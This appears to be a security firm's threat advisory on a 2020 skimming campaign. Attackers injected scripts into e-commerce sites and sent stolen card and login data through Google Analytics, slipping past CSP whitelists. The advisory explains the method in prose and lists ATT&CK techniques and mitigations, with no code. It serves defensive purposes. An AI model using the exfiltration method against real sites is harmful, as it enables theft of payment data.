Google Analytics Being Used to Bypass Web Security
I. Targeted Industries
- E-commerce sites
- Higher Education
- Local Government
On June 17, 2020, researchers from several security companies, including PerimeterX, Sansec, and Kaspersky, discovered a vulnerability found in Content Security Policy (CSP), which is used to prevent credit card skimming attacks. The CSP was found to be useless on websites that also deploy Google Analytics (GA). This has been successful because e-commerce sites that use Google Web Analytics to track visitors whitelist Google Analytics domains in their CSP configurations. Sansec’s research team also found that threat actors in this campaign were running their nefarious intents on Google servers to avoid being flagged as “suspicious”.
III. Background Information
Content Security Policy (CSP) is a security measure that helps to detect and mitigate threats stemming from cross-site scripting vulnerabilities. It allows for only specific trusted domains to execute scripts on the site and thus avoid any cross-site scripting from untrusted sites and domains. Attackers have taken advantage of this because Google Analytics has been deemed safe in many domains.
The Google Analytics platform is a service used to track visitors and traffic on websites. Attackers have been injecting web skimmer scripts that are specifically designed to encode stolen data from compromised sites. A small piece of java code also transfers data collected such as credentials through an event and other Google Analytics parameters. Attackers will then add their Tag ID (such as UA-#######-#) to send all the information to their Google Analytics accounts in encrypted form. Once the data is in their GA dashboard, they will decrypt it using an XOR encryption key. All websites are hosted on trusted Google servers at firebasestorage.googleapis.com, making it more difficult to suspect the skimming campaign. Attackers also make sure that developer mode is disabled before proceeding with the attack to make it more covert.
- T1041 -Exfiltration Over Command and Control Channel
Data exfiltration is performed over the Command and Control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications.
- T1119 – Automated Collection
Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include the use of scripting to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools.
- Use adaptive URLs that would add the ID as a part of the URL
Experts believe this could “allow admins to set CSP rules that restrict data exfiltration to other accounts”.
- Use XHR proxy enforcement
Using XHR proxy enforcement could allow rules regarding the type of data being transferred and restrict certain details such as usernames or passwords from being transferred over.
- Vulnerability Monitoring
Stay up to date and informed as Google works on a resolution to this issue on their analytics platform
- Monitor bank and account information
Monitor your bank and account information for signs of compromise.
- Incorporate Known IOCs into IDS
Incorporate the known IOCs of the attack into your intrusion detection system (IDS) to catch any suspicious behavior related to the attack.
VI. Indicators of Compromise (IOCs)
The link below has been included to assist with the download of some identified IOC’s related to this Threat Advisory Report. Be on the lookout for these IOC’s, as well as anything that looks similar.
(1) Asif, Sudais. “Attackers Steal Payment Information through Google Analytics.” www.hackread.com, June 23, 2020. https://www.hackread.com/attackers-steal-payment-data-google-analytics/.
(2) Gatlan, Sergiu. “Hackers use Google Analytics to steal credit cards, bypass CSP.” BleepingComputer. BleepingComputer.com, July 2,2020. https://www.bleepingcomputer.com/news/security/hackers-use-google-analytics-to-steal-credit-cards-bypass-csp/
(3) Lakshmanan, Ravie. “Hackers USign Google Analytics to Bypass Web Security and Steal Credit Cards.” The Hacker News, July 2, 2020. https://thehackernews.com/2020/06/google-analytics-hacking.html
(4) “Save Your Credit Card Details From Getting Stolen Via Google Analytics!” cyware.com, July 7, 2020. https://cyware.com/news/save-your-credit-card-details-from-getting-stolen-via-google-analytics-209bce67.